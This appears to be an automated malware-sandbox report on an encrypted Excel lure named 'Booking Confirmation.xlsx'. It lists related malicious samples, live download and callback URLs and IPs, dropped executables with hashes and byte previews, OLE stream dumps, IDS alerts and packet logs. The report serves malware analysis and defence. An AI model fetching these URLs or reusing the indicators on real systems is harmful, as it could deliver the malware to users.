                                                                                                                                                    • www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
                                                                                                                                                    7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
                                                                                                                                                    ptFIhqUe89.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
                                                                                                                                                    G1K3UzwJBx.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD
                                                                                                                                                    ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.befitptstudio.com/ogg/?oN9xX=4mwbOnk+WEse1PEPUI+9OE7CuRKrYpR8Uy9t/eBM2SPWQ9N1Pm1uQBQ852Ah+FLlD8dO/Q==&r8=-ZoxsbmheH5H_0_
                                                                                                                                                    Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • www.thesiromiel.com/kgw/?qDH4D=f8c0xBrPYPKd&ML30a=2i2TlC6nSGv7nfRnhje0HOiHksQfPDJcIBIB+Miyp4ApD+T5OEbWO8tIEn4OYJPJCmlhDQ==
                                                                                                                                                    C03N224Hbu.exeGet hashmaliciousBrowse
                                                                                                                                                    • www.pethgroup.com/mfg6/?Dz=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSeqAONTEuC2HA&lnuh=TxllfFx

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    WEBAIR-INTERNETUSLv3pXahxWE.exeGet hashmaliciousBrowse
                                                                                                                                                    • 216.130.188.93
                                                                                                                                                    http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                                                                                                    • 174.137.133.49
                                                                                                                                                    http://septterror.tripod.com/the911basics.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 174.137.133.49
                                                                                                                                                    MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    http://violinstop.com/TAR3D.dllGet hashmaliciousBrowse
                                                                                                                                                    • 69.42.65.212
                                                                                                                                                    http://static.publicocdn.comGet hashmaliciousBrowse
                                                                                                                                                    • 174.137.133.49
                                                                                                                                                    Tu8O5QdOKb.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    ZYsTo6YDs9.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    1vsFZtOf9z.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    iL8ddTEpbR.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    sr43539SKp.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    rYgqmGG4iv.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    xaVDKpgbfl.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    2Acg74pnzd.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    p7ZXKudJWx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    0026.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    001-22.exeGet hashmaliciousBrowse
                                                                                                                                                    • 213.247.47.190
                                                                                                                                                    http://targetsollutions.comGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.8.164
                                                                                                                                                    http://rstuniform.comGet hashmaliciousBrowse
                                                                                                                                                    • 173.239.5.6
                                                                                                                                                    http://scamcharge.comGet hashmaliciousBrowse
                                                                                                                                                    • 174.137.133.49
                                                                                                                                                    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNPI202009255687.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    IN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Purchase Order PRI19-338.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    Copy of Dwg for order DLH200909ShzuSh.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.130
                                                                                                                                                    STATEMENT NOV20.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    IN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    SCAN_ARRIVAL_DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.120
                                                                                                                                                    PO23419852020.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.124
                                                                                                                                                    New Order .xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Request for quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.87
                                                                                                                                                    Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.120
                                                                                                                                                    Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.122

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                    IE Cache URL:http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........o..........1....j...............................................0..........(....*...0..........r...p..r...p(....(....:.... ..%. .:..a%..^E............O...............}...8....(......-. ..#.%+. .\..%&+..(....(....r...p(....,. -X..%+. d..U%&. *...Za+..r)..p(....(....,. %._%+. ..*%&. ..8KZa8X...rM..p(..... ..Z X,.xa8<....(.... .).8,..........s....(....%.(.....(....*..0...............('...*..0..L........u......:.... ...5 X.5.a%...^E........................z.......g.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1099960
                                                                                                                                                    Entropy (8bit):2.0153298378795275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:PXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:VahIFdyiaT2qtXw
                                                                                                                                                    MD5:26D1591924B93332C93C4DAC0950AE17
                                                                                                                                                    SHA1:3E92ECC9EF71E262C4607DED0ED85C0C16FCF18E
                                                                                                                                                    SHA-256:B6FB1C5D8AA5E51E4668270CA5BCDDBE6F5A0DC292F9D82CA429240CDEB47A84
                                                                                                                                                    SHA-512:797D4CDF629E88C835FEC6ED915508221F6CEF3AEFFAFEFD103BFFD683B08F4B422D957DDB94D316E979C7A3C272346734DA1117F25A3AE644CB6EE3B9B6A5B3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................d...........H....N.U............0........N.U........ ....y.Q........ ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.............T...X............2.Q........0...0....{.Q....X.......dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A709BC1.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB9FCECE.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                    C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........o..........1....j...............................................0..........(....*...0..........r...p..r...p(....(....:.... ..%. .:..a%..^E............O...............}...8....(......-. ..#.%+. .\..%&+..(....(....r...p(....,. -X..%+. d..U%&. *...Za+..r)..p(....(....,. %._%+. ..*%&. ..8KZa8X...rM..p(..... ..Z X,.xa8<....(.... .).8,..........s....(....%.(.....(....*..0...............('...*..0..L........u......:.... ...5 X.5.a%...^E........................z.......g.

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:CDFV2 Encrypted
                                                                                                                                                    Entropy (8bit):7.996438735158698
                                                                                                                                                    TrID:
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                    File name:Booking Confirmation.xlsx
                                                                                                                                                    File size:2169344
                                                                                                                                                    MD5:97ee696e60901ec520c93f0e8b29b956
                                                                                                                                                    SHA1:89780a503e1b57b7d224feb43c5db4db60ede9ff
                                                                                                                                                    SHA256:2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
                                                                                                                                                    SHA512:2af275f7b9d0a9c563972caf51d3550d9a5e8f6d77302071115baf1ae37d6facc00b2d6b3f03270c2ab5ba7934d40d75dc635be5017ccc65fbcbb3d20893f57d
                                                                                                                                                    SSDEEP:49152:HQIDUI5g3cMwIEfNzZgGBfCReviw1hkmhvdaYf2XmjrM41KtNFvE:1UMg0IuZgwCcvirmhAYfBc41KTFM
                                                                                                                                                    File Content Preview:........................>..................."...................................................................................~.......~...............z.......|.......~...............z.......|.......~......................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Booking Confirmation.xlsx"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:False
                                                                                                                                                    Application Name:unknown
                                                                                                                                                    Encrypted Document:True
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:64
                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:112
                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:200
                                                                                                                                                    Entropy:3.13335930328
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/Version
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:76
                                                                                                                                                    Entropy:2.79079600998
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 2148088
                                                                                                                                                    General
                                                                                                                                                    Stream Path:EncryptedPackage
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:2148088
                                                                                                                                                    Entropy:7.99989686385
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . r c = . . s c . 3 . . . . . . . . . . " L . C G . 4 . . $ ? . . . . . . ! . . e A D . . K . . = ' . . 4 . . . . ' . . . . . Z 9 ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 .
                                                                                                                                                    Data Raw:e7 c6 20 00 00 00 00 00 72 63 3d 0c f9 73 63 9a 33 18 12 1a 1a cd a4 8a a6 8a 8c 22 4c d0 43 47 bc 34 f9 fd 24 3f 99 ef cd 13 7f ed 21 1d e3 65 41 44 09 d2 4b aa 83 3d 27 a9 0c 34 bd 1e 96 ca 27 a9 bf bd 02 bc 5a 39 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08
                                                                                                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                    General
                                                                                                                                                    Stream Path:EncryptionInfo
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:224
                                                                                                                                                    Entropy:4.58731087048
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . p W . . . . . . < . ~ . . e < . . I . . ~ . . . . . . . . . . . . . 8 . . 4 . . . K | F . [ * . ` Q 0 . D . } . G y . . - .
                                                                                                                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    11/26/20-09:03:42.330791TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5
                                                                                                                                                    11/26/20-09:05:07.821191TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 26, 2020 09:03:42.098721981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.330104113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.330276966 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.330790997 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558485985 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558520079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558537006 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558552980 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558569908 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558594942 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558605909 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.781543016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781585932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781598091 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781610012 CET8049165103.125.191.5192.168.2.22
